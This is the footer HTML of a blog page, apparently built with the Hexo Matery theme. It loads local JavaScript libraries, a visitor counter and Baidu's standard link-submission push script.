<div id="backTop" class="top-scroll">
    <a class="btn-floating btn-large waves-effect waves-light" href="#!">
        <i class="fas fa-arrow-up"></i>
    </a>
</div>


    <script src="/libs/materialize/materialize.min.js"></script>
    <script src="/libs/masonry/masonry.pkgd.min.js"></script>
    <script src="/libs/aos/aos.js"></script>
    <script src="/libs/scrollprogress/scrollProgress.min.js"></script>
    <script src="/libs/lightGallery/js/lightgallery-all.min.js"></script>
    <script src="/js/matery.js"></script>

    <!-- Baidu Analytics -->

    <!-- Baidu Push -->

<script>
    (function () {
        var bp = document.createElement('script');
        var curProtocol = window.location.protocol.split(':')[0];
        if (curProtocol === 'https') {
            bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
        } else {
            bp.src = 'http://push.zhanzhang.baidu.com/push.js';
        }
        var s = document.getElementsByTagName("script")[0];
        s.parentNode.insertBefore(bp, s);
    })();
</script>

    
    
    <script async src="/libs/others/busuanzi.pure.mini.js"></script>
    

    

    

    

    
    
    <script type="text/javascript" size="150" alpha='0.6'
        zIndex="-1" src="/libs/background/ribbon-refresh.min.js" async="async"></script>
    

    

    
    <script src="/libs/instantpage/instantpage.js" type="module"></script>
    

</body>

</html>
